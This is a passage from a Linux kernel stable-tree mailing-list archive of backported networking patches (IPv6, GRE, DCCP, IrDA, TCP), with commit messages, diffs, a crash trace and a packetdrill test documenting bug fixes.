 	idev = in6_dev_get(dev);
 
@@ -901,6 +913,8 @@ int __ipv6_dev_mc_dec(struct inet6_dev *idev, const struct in6_addr *addr)
 {
 	struct ifmcaddr6 *ma, **map;
 
+	ASSERT_RTNL();
+
 	write_lock_bh(&idev->lock);
 	for (map = &idev->mc_list; (ma=*map) != NULL; map = &ma->next) {
 		if (ipv6_addr_equal(&ma->mca_addr, addr)) {
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 224/319] ip6_gre: fix flowi6_proto value in ip6gre_xmit_other()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (122 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 223/319] ipv6: fix rtnl locking in setsockopt for anycast and multicast Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 225/319] ipv6: correctly add local routes when lo goes up Willy Tarreau
                   ` (94 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Lance Richardson, David S . Miller, Willy Tarreau

From: Lance Richardson <lrichard@redhat.com>

commit db32e4e49ce2b0e5fcc17803d011a401c0a637f6 upstream.

Similar to commit 3be07244b733 ("ip6_gre: fix flowi6_proto value in
xmit path"), set flowi6_proto to IPPROTO_GRE for output route lookup.

Up until now, ip6gre_xmit_other() has set flowi6_proto to a bogus value.
This affected output route lookup for packets sent on an ip6gretap device
in cases where routing was dependent on the value of flowi6_proto.

Since the correct proto is already set in the tunnel flowi6 template via
commit 252f3f5a1189 ("ip6_gre: Set flowi6_proto as IPPROTO_GRE in xmit
path."), simply delete the line setting the incorrect flowi6_proto value.

Suggested-by: Jiri Benc <jbenc@redhat.com>
Fixes: c12b395a4664 ("gre: Support GRE over IPv6")
Reviewed-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Signed-off-by: Lance Richardson <lrichard@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/ipv6/ip6_gre.c | 1 -
 1 file changed, 1 deletion(-)

diff --git a/net/ipv6/ip6_gre.c b/net/ipv6/ip6_gre.c
index 7eb7267..603f251 100644
--- a/net/ipv6/ip6_gre.c
+++ b/net/ipv6/ip6_gre.c
@@ -890,7 +890,6 @@ static int ip6gre_xmit_other(struct sk_buff *skb, struct net_device *dev)
 		encap_limit = t->parms.encap_limit;
 
 	memcpy(&fl6, &t->fl.u.ip6, sizeof(fl6));
-	fl6.flowi6_proto = skb->protocol;
 
 	err = ip6gre_xmit2(skb, dev, 0, &fl6, encap_limit, &mtu);
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 225/319] ipv6: correctly add local routes when lo goes up
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (123 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 224/319] ip6_gre: fix flowi6_proto value in ip6gre_xmit_other() Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 226/319] ipv6: dccp: fix out of bound access in dccp_v6_err() Willy Tarreau
                   ` (93 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Nicolas Dichtel, Balakumaran Kannan, Maruthi Thotad,
	Sabrina Dubroca, Hannes Frederic Sowa, Weilong Chen, Gao feng,
	David S . Miller, Willy Tarreau

From: Nicolas Dichtel <nicolas.dichtel@6wind.com>

commit a220445f9f4382c36a53d8ef3e08165fa27f7e2c upstream.

The goal of the patch is to fix this scenario:
 ip link add dummy1 type dummy
 ip link set dummy1 up
 ip link set lo down ; ip link set lo up

After that sequence, the local route to the link layer address of dummy1 is
not there anymore.

When the loopback is set down, all local routes are deleted by
addrconf_ifdown()/rt6_ifdown(). At this time, the rt6_info entry still
exists, because the corresponding idev has a reference on it. After the rcu
grace period, dst_rcu_free() is called, and thus ___dst_free(), which will
set obsolete to DST_OBSOLETE_DEAD.

In this case, init_loopback() is called before dst_rcu_free(), thus
obsolete is still sets to something <= 0. So, the function doesn't add the
route again. To avoid that race, let's check the rt6 refcnt instead.

Fixes: 25fb6ca4ed9c ("net IPv6 : Fix broken IPv6 routing table after loopback down-up")
Fixes: a881ae1f625c ("ipv6: don't call addrconf_dst_alloc again when enable lo")
Fixes: 33d99113b110 ("ipv6: reallocate addrconf router for ipv6 address when lo device up")
Reported-by: Francesco Santoro <francesco.santoro@6wind.com>
Reported-by: Samuel Gauthier <samuel.gauthier@6wind.com>
CC: Balakumaran Kannan <Balakumaran.Kannan@ap.sony.com>
CC: Maruthi Thotad <Maruthi.Thotad@ap.sony.com>
CC: Sabrina Dubroca <sd@queasysnail.net>
CC: Hannes Frederic Sowa <hannes@stressinduktion.org>
CC: Weilong Chen <chenweilong@huawei.com>
CC: Gao feng <gaofeng@cn.fujitsu.com>
Signed-off-by: Nicolas Dichtel <nicolas.dichtel@6wind.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/ipv6/addrconf.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
index 3bfd8a5..a3e2c34 100644
--- a/net/ipv6/addrconf.c
+++ b/net/ipv6/addrconf.c
@@ -2709,7 +2709,7 @@ static void init_loopback(struct net_device *dev)
 				 * lo device down, release this obsolete dst and
 				 * reallocate a new router for ifa.
 				 */
-				if (sp_ifa->rt->dst.obsolete > 0) {
+				if (!atomic_read(&sp_ifa->rt->rt6i_ref)) {
 					ip6_rt_put(sp_ifa->rt);
 					sp_ifa->rt = NULL;
 				} else {
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 226/319] ipv6: dccp: fix out of bound access in dccp_v6_err()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (124 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 225/319] ipv6: correctly add local routes when lo goes up Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 227/319] ipv6: dccp: add missing bind_conflict to dccp_ipv6_mapped Willy Tarreau
                   ` (92 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Eric Dumazet, David S . Miller, Willy Tarreau

From: Eric Dumazet <edumazet@google.com>

commit 1aa9d1a0e7eefcc61696e147d123453fc0016005 upstream.

dccp_v6_err() does not use pskb_may_pull() and might access garbage.

We only need 4 bytes at the beginning of the DCCP header, like TCP,
so the 8 bytes pulled in icmpv6_notify() are more than enough.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/dccp/ipv6.c | 15 ++++++++-------
 1 file changed, 8 insertions(+), 7 deletions(-)

diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
index 6cf9f77..fb72107 100644
--- a/net/dccp/ipv6.c
+++ b/net/dccp/ipv6.c
@@ -83,7 +83,7 @@ static void dccp_v6_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
 			u8 type, u8 code, int offset, __be32 info)
 {
 	const struct ipv6hdr *hdr = (const struct ipv6hdr *)skb->data;
-	const struct dccp_hdr *dh = (struct dccp_hdr *)(skb->data + offset);
+	const struct dccp_hdr *dh;
 	struct dccp_sock *dp;
 	struct ipv6_pinfo *np;
 	struct sock *sk;
@@ -91,12 +91,13 @@ static void dccp_v6_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
 	__u64 seq;
 	struct net *net = dev_net(skb->dev);
 
-	if (skb->len < offset + sizeof(*dh) ||
-	    skb->len < offset + __dccp_basic_hdr_len(dh)) {
-		ICMP6_INC_STATS_BH(net, __in6_dev_get(skb->dev),
-				   ICMP6_MIB_INERRORS);
-		return;
-	}
+	/* Only need dccph_dport & dccph_sport which are the first
+	 * 4 bytes in dccp header.
+	 * Our caller (icmpv6_notify()) already pulled 8 bytes for us.
+	 */
+	BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_sport) > 8);
+	BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_dport) > 8);
+	dh = (struct dccp_hdr *)(skb->data + offset);
 
 	sk = inet6_lookup(net, &dccp_hashinfo,
 			&hdr->daddr, dh->dccph_dport,
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 227/319] ipv6: dccp: add missing bind_conflict to dccp_ipv6_mapped
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (125 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 226/319] ipv6: dccp: fix out of bound access in dccp_v6_err() Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 228/319] ip6_tunnel: Clear IP6CB in ip6tunnel_xmit() Willy Tarreau
                   ` (91 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Eric Dumazet, Arnaldo Carvalho de Melo, David S . Miller, Willy Tarreau

From: Eric Dumazet <edumazet@google.com>

commit 990ff4d84408fc55942ca6644f67e361737b3d8e upstream.

While fuzzing kernel with syzkaller, Andrey reported a nasty crash
in inet6_bind() caused by DCCP lacking a required method.

Fixes: ab1e0a13d7029 ("[SOCK] proto: Add hashinfo member to struct proto")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Cc: Arnaldo Carvalho de Melo <acme@redhat.com>
Acked-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/dccp/ipv6.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
index fb72107..94f8224 100644
--- a/net/dccp/ipv6.c
+++ b/net/dccp/ipv6.c
@@ -1014,6 +1014,7 @@ static const struct inet_connection_sock_af_ops dccp_ipv6_mapped = {
 	.getsockopt	   = ipv6_getsockopt,
 	.addr2sockaddr	   = inet6_csk_addr2sockaddr,
 	.sockaddr_len	   = sizeof(struct sockaddr_in6),
+	.bind_conflict	   = inet6_csk_bind_conflict,
 #ifdef CONFIG_COMPAT
 	.compat_setsockopt = compat_ipv6_setsockopt,
 	.compat_getsockopt = compat_ipv6_getsockopt,
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 228/319] ip6_tunnel: Clear IP6CB in ip6tunnel_xmit()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (126 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 227/319] ipv6: dccp: add missing bind_conflict to dccp_ipv6_mapped Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 229/319] ip6_tunnel: disable caching when the traffic class is inherited Willy Tarreau
                   ` (90 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Eli Cooper, David S . Miller, Willy Tarreau

From: Eli Cooper <elicooper@gmx.com>

commit 23f4ffedb7d751c7e298732ba91ca75d224bc1a6 upstream.

skb->cb may contain data from previous layers. In the observed scenario,
the garbage data were misinterpreted as IP6CB(skb)->frag_max_size, so
that small packets sent through the tunnel are mistakenly fragmented.

This patch unconditionally clears the control buffer in ip6tunnel_xmit(),
which affects ip6_tunnel, ip6_udp_tunnel and ip6_gre. Currently none of
these tunnels set IP6CB(skb)->flags, otherwise it needs to be done earlier.

Cc: stable@vger.kernel.org
Signed-off-by: Eli Cooper <elicooper@gmx.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/net/ip6_tunnel.h | 1 +
 1 file changed, 1 insertion(+)

diff --git a/include/net/ip6_tunnel.h b/include/net/ip6_tunnel.h
index 4da5de1..b140c60 100644
--- a/include/net/ip6_tunnel.h
+++ b/include/net/ip6_tunnel.h
@@ -75,6 +75,7 @@ static inline void ip6tunnel_xmit(struct sk_buff *skb, struct net_device *dev)
 	int pkt_len, err;
 
 	nf_reset(skb);
+	memset(skb->cb, 0, sizeof(struct inet6_skb_parm));
 	pkt_len = skb->len;
 	err = ip6_local_out(skb);
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 229/319] ip6_tunnel: disable caching when the traffic class is inherited
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (127 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 228/319] ip6_tunnel: Clear IP6CB in ip6tunnel_xmit() Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 230/319] net/irda: handle iriap_register_lsap() allocation failure Willy Tarreau
                   ` (89 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Paolo Abeni, Liam McBirnie, David S . Miller, Willy Tarreau

From: Paolo Abeni <pabeni@redhat.com>

commit b5c2d49544e5930c96e2632a7eece3f4325a1888 upstream.

If an ip6 tunnel is configured to inherit the traffic class from
the inner header, the dst_cache must be disabled or it will foul
the policy routing.

The issue is apprently there since at leat Linux-2.6.12-rc2.

Reported-by: Liam McBirnie <liam.mcbirnie@boeing.com>
Cc: Liam McBirnie <liam.mcbirnie@boeing.com>
Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: Paolo Abeni <pabeni@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/ipv6/ip6_tunnel.c | 13 +++++++++++--
 1 file changed, 11 insertions(+), 2 deletions(-)

diff --git a/net/ipv6/ip6_tunnel.c b/net/ipv6/ip6_tunnel.c
index 31bab1a..12984e6 100644
--- a/net/ipv6/ip6_tunnel.c
+++ b/net/ipv6/ip6_tunnel.c
@@ -950,12 +950,21 @@ static int ip6_tnl_xmit2(struct sk_buff *skb,
 	struct ipv6_tel_txoption opt;
 	struct dst_entry *dst = NULL, *ndst = NULL;
 	struct net_device *tdev;
+	bool use_cache = false;
 	int mtu;
 	unsigned int max_headroom = sizeof(struct ipv6hdr);
 	u8 proto;
 	int err = -1;
 
-	if (!fl6->flowi6_mark)
+	if (!(t->parms.flags &
+		     (IP6_TNL_F_USE_ORIG_TCLASS | IP6_TNL_F_USE_ORIG_FWMARK))) {
+		/* enable the cache only only if the routing decision does
+		 * not depend on the current inner header value
+		 */
+		use_cache = true;
+	}
+
+	if (use_cache)
 		dst = ip6_tnl_dst_check(t);
 	if (!dst) {
 		ndst = ip6_route_output(net, NULL, fl6);
@@ -1012,7 +1021,7 @@ static int ip6_tnl_xmit2(struct sk_buff *skb,
 		skb = new_skb;
 	}
 	skb_dst_drop(skb);
-	if (fl6->flowi6_mark) {
+	if (!use_cache) {
 		skb_dst_set(skb, dst);
 		ndst = NULL;
 	} else {
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 230/319] net/irda: handle iriap_register_lsap() allocation failure
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (128 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 229/319] ip6_tunnel: disable caching when the traffic class is inherited Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 231/319] tcp: fix use after free in tcp_xmit_retransmit_queue() Willy Tarreau
                   ` (88 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Vegard Nossum, David S . Miller, Willy Tarreau

From: Vegard Nossum <vegard.nossum@oracle.com>

commit 5ba092efc7ddff040777ae7162f1d195f513571b upstream.

If iriap_register_lsap() fails to allocate memory, self->lsap is
set to NULL. However, none of the callers handle the failure and
irlmp_connect_request() will happily dereference it:

    iriap_register_lsap: Unable to allocated LSAP!
    ================================================================================
    UBSAN: Undefined behaviour in net/irda/irlmp.c:378:2
    member access within null pointer of type 'struct lsap_cb'
    CPU: 1 PID: 15403 Comm: trinity-c0 Not tainted 4.8.0-rc1+ #81
    Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.3-0-ge2fc41e-prebuilt.qemu-project.org
    04/01/2014
     0000000000000000 ffff88010c7e78a8 ffffffff82344f40 0000000041b58ab3
     ffffffff84f98000 ffffffff82344e94 ffff88010c7e78d0 ffff88010c7e7880
     ffff88010630ad00 ffffffff84a5fae0 ffffffff84d3f5c0 000000000000017a
    Call Trace:
     [<ffffffff82344f40>] dump_stack+0xac/0xfc
     [<ffffffff8242f5a8>] ubsan_epilogue+0xd/0x8a
     [<ffffffff824302bf>] __ubsan_handle_type_mismatch+0x157/0x411
     [<ffffffff83b7bdbc>] irlmp_connect_request+0x7ac/0x970
     [<ffffffff83b77cc0>] iriap_connect_request+0xa0/0x160
     [<ffffffff83b77f48>] state_s_disconnect+0x88/0xd0
     [<ffffffff83b78904>] iriap_do_client_event+0x94/0x120
     [<ffffffff83b77710>] iriap_getvaluebyclass_request+0x3e0/0x6d0
     [<ffffffff83ba6ebb>] irda_find_lsap_sel+0x1eb/0x630
     [<ffffffff83ba90c8>] irda_connect+0x828/0x12d0
     [<ffffffff833c0dfb>] SYSC_connect+0x22b/0x340
     [<ffffffff833c7e09>] SyS_connect+0x9/0x10
     [<ffffffff81007bd3>] do_syscall_64+0x1b3/0x4b0
     [<ffffffff845f946a>] entry_SYSCALL64_slow_path+0x25/0x25
    ================================================================================

The bug seems to have been around since forever.

There's more problems with missing error checks in iriap_init() (and
indeed all of irda_init()), but that's a bigger problem that needs
very careful review and testing. This patch will fix the most serious
bug (as it's easily reached from unprivileged userspace).

I have tested my patch with a reproducer.

Signed-off-by: Vegard Nossum <vegard.nossum@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/irda/iriap.c | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/net/irda/iriap.c b/net/irda/iriap.c
index e1b37f5..bd42516 100644
--- a/net/irda/iriap.c
+++ b/net/irda/iriap.c
@@ -191,8 +191,12 @@ struct iriap_cb *iriap_open(__u8 slsap_sel, int mode, void *priv,
 
 	self->magic = IAS_MAGIC;
 	self->mode = mode;
-	if (mode == IAS_CLIENT)
-		iriap_register_lsap(self, slsap_sel, mode);
+	if (mode == IAS_CLIENT) {
+		if (iriap_register_lsap(self, slsap_sel, mode)) {
+			kfree(self);
+			return NULL;
+		}
+	}
 
 	self->confirm = callback;
 	self->priv = priv;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 231/319] tcp: fix use after free in tcp_xmit_retransmit_queue()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (129 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 230/319] net/irda: handle iriap_register_lsap() allocation failure Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 232/319] tcp: properly scale window in tcp_v[46]_reqsk_send_ack() Willy Tarreau
                   ` (87 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Eric Dumazet, Ilpo J�rvinen, Yuchung Cheng, Neal Cardwell,
	David S . Miller, Willy Tarreau

From: Eric Dumazet <edumazet@google.com>

commit bb1fceca22492109be12640d49f5ea5a544c6bb4 upstream.

When tcp_sendmsg() allocates a fresh and empty skb, it puts it at the
tail of the write queue using tcp_add_write_queue_tail()

Then it attempts to copy user data into this fresh skb.

If the copy fails, we undo the work and remove the fresh skb.

Unfortunately, this undo lacks the change done to tp->highest_sack and
we can leave a dangling pointer (to a freed skb)

Later, tcp_xmit_retransmit_queue() can dereference this pointer and
access freed memory. For regular kernels where memory is not unmapped,
this might cause SACK bugs because tcp_highest_sack_seq() is buggy,
returning garbage instead of tp->snd_nxt, but with various debug
features like CONFIG_DEBUG_PAGEALLOC, this can crash the kernel.

This bug was found by Marco Grassi thanks to syzkaller.

Fixes: 6859d49475d4 ("[TCP]: Abstract tp->highest_sack accessing & point to next skb")
Reported-by: Marco Grassi <marco.gra@gmail.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Ilpo Järvinen <ilpo.jarvinen@helsinki.fi>
Cc: Yuchung Cheng <ycheng@google.com>
Cc: Neal Cardwell <ncardwell@google.com>
Acked-by: Neal Cardwell <ncardwell@google.com>
Reviewed-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/net/tcp.h | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/include/net/tcp.h b/include/net/tcp.h
index 29a1a63..1c5e037 100644
--- a/include/net/tcp.h
+++ b/include/net/tcp.h
@@ -1392,6 +1392,8 @@ static inline void tcp_check_send_head(struct sock *sk, struct sk_buff *skb_unli
 {
 	if (sk->sk_send_head == skb_unlinked)
 		sk->sk_send_head = NULL;
+	if (tcp_sk(sk)->highest_sack == skb_unlinked)
+		tcp_sk(sk)->highest_sack = NULL;
 }
 
 static inline void tcp_init_send_head(struct sock *sk)
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 232/319] tcp: properly scale window in tcp_v[46]_reqsk_send_ack()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (130 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 231/319] tcp: fix use after free in tcp_xmit_retransmit_queue() Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 233/319] tcp: fix overflow in __tcp_retransmit_skb() Willy Tarreau
                   ` (86 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Eric Dumazet, Yuchung Cheng, Neal Cardwell, David S . Miller,
	Willy Tarreau

From: Eric Dumazet <edumazet@google.com>

commit 20a2b49fc538540819a0c552877086548cff8d8d upstream.

When sending an ack in SYN_RECV state, we must scale the offered
window if wscale option was negotiated and accepted.

Tested:
 Following packetdrill test demonstrates the issue :

0.000 socket(..., SOCK_STREAM, IPPROTO_TCP) = 3
+0 setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

+0 bind(3, ..., ...) = 0
+0 listen(3, 1) = 0

// Establish a connection.
+0 < S 0:0(0) win 20000 <mss 1000,sackOK,wscale 7, nop, TS val 100 ecr 0>
+0 > S. 0:0(0) ack 1 win 28960 <mss 1460,sackOK, TS val 100 ecr 100, nop, wscale 7>

+0 < . 1:11(10) ack 1 win 156 <nop,nop,TS val 99 ecr 100>
// check that window is properly scaled !
+0 > . 1:1(0) ack 1 win 226 <nop,nop,TS val 200 ecr 100>

Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Yuchung Cheng <ycheng@google.com>
Cc: Neal Cardwell <ncardwell@google.com>
Acked-by: Yuchung Cheng <ycheng@google.com>
Acked-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/ipv4/tcp_ipv4.c | 3 ++-
 net/ipv6/tcp_ipv6.c | 8 +++++++-
 2 files changed, 9 insertions(+), 2 deletions(-)

diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
index 11f27a4..5401fbf 100644
--- a/net/ipv4/tcp_ipv4.c
+++ b/net/ipv4/tcp_ipv4.c
@@ -824,7 +824,8 @@ static void tcp_v4_reqsk_send_ack(struct sock *sk, struct sk_buff *skb,
 	 */
 	tcp_v4_send_ack(skb, (sk->sk_state == TCP_LISTEN) ?
 			tcp_rsk(req)->snt_isn + 1 : tcp_sk(sk)->snd_nxt,
-			tcp_rsk(req)->rcv_nxt, req->rcv_wnd,
+			tcp_rsk(req)->rcv_nxt,
+			req->rcv_wnd >> inet_rsk(req)->rcv_wscale,
 			tcp_time_stamp,
 			req->ts_recent,
 			0,
diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
index 41c026f..d823738 100644
--- a/net/ipv6/tcp_ipv6.c
+++ b/net/ipv6/tcp_ipv6.c
@@ -902,8 +902,14 @@ static void tcp_v6_timewait_ack(struct sock *sk, struct sk_buff *skb)
 static void tcp_v6_reqsk_send_ack(struct sock *sk, struct sk_buff *skb,
 				  struct request_sock *req)
 {
+	/* RFC 7323 2.3
+	 * The window field (SEG.WND) of every outgoing segment, with the
+	 * exception of <SYN> segments, MUST be right-shifted by
+	 * Rcv.Wind.Shift bits:
+	 */
 	tcp_v6_send_ack(skb, tcp_rsk(req)->snt_isn + 1, tcp_rsk(req)->rcv_isn + 1,
-			req->rcv_wnd, tcp_time_stamp, req->ts_recent,
+			req->rcv_wnd >> inet_rsk(req)->rcv_wscale,
+			tcp_time_stamp, req->ts_recent,
 			tcp_v6_md5_do_lookup(sk, &ipv6_hdr(skb)->daddr), 0);
 }
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 233/319] tcp: fix overflow in __tcp_retransmit_skb()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (131 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 232/319] tcp: properly scale window in tcp_v[46]_reqsk_send_ack() Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 234/319] tcp: fix wrong checksum calculation on MTU probing Willy Tarreau
                   ` (85 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Eric Dumazet, David S . Miller, Willy Tarreau

From: Eric Dumazet <edumazet@google.com>

commit ffb4d6c8508657824bcef68a36b2a0f9d8c09d10 upstream.

If a TCP socket gets a large write queue, an overflow can happen
in a test in __tcp_retransmit_skb() preventing all retransmits.

The flow then stalls and resets after timeouts.

Tested:

sysctl -w net.core.wmem_max=1000000000
netperf -H dest -- -s 1000000000

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/ipv4/tcp_output.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
index 276b283..465285b 100644
--- a/net/ipv4/tcp_output.c
+++ b/net/ipv4/tcp_output.c
@@ -2327,7 +2327,8 @@ int __tcp_retransmit_skb(struct sock *sk, struct sk_buff *skb)
 	 * copying overhead: fragmentation, tunneling, mangling etc.
 	 */
 	if (atomic_read(&sk->sk_wmem_alloc) >
-	    min(sk->sk_wmem_queued + (sk->sk_wmem_queued >> 2), sk->sk_sndbuf))
+	    min_t(u32, sk->sk_wmem_queued + (sk->sk_wmem_queued >> 2),
+		  sk->sk_sndbuf))
 		return -EAGAIN;
 
 	if (before(TCP_SKB_CB(skb)->seq, tp->snd_una)) {
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 234/319] tcp: fix wrong checksum calculation on MTU probing
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (132 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 233/319] tcp: fix overflow in __tcp_retransmit_skb() Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 235/319] tcp: take care of truncations done by sk_filter() Willy Tarreau
